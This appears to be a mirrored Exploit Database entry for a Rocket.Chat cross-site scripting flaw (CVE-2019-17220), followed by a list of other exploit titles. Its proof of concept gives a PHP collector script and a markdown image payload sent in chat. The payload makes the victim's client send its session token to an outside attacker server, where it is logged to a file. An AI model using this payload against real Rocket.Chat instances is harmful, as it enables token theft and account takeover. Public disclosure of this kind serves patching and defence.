Rocket.Chat 2.1.0 – Cross-Site Scripting

Exploit Database
99 阅读

作者： 3H34N

日期： 2019-10-23
类别：
- webapps
平台：
- linux
来源：https://www.exploit-db.com/exploits/47537/

# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
# Author: 3H34N
# Date: 2019-10-22
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat < 2.1.0
# CVE: CVE-2019-17220
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)

# PoC
# 1. Create l33t.php on a web server

<?php
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>

# 2. Open a chat session
# 3. Send payload with your web server url

![title](http://10.10.1.5/l33t.php?leet=+`{}token`)

# 4. Token will be written in logs.txt when target seen your message.

last Exploits
Rocket.Chat 2.1.0 – Cross-Site Scripting的更多信息

YT-Videos Script – ‘id’ SQL Injection：
CyberPanel 2.1 – Remote Code Execution (RCE) (Authenticated)：
Link CMS – SQL Injection：
E-Mail Security Virtual Appliance – ‘learn-msg.cgi’ Command Injection (Metasploit)：
DiamondList – ‘/user/main/update_category?category[description]’ Cross-Site Scripting：
ProjectSend r754 – Insecure Direct Object Reference：
dirLIST 0.3.0 – Arbitrary File Upload：
Freelancers Marketplace Script – Persistent Cross-Site Scripting：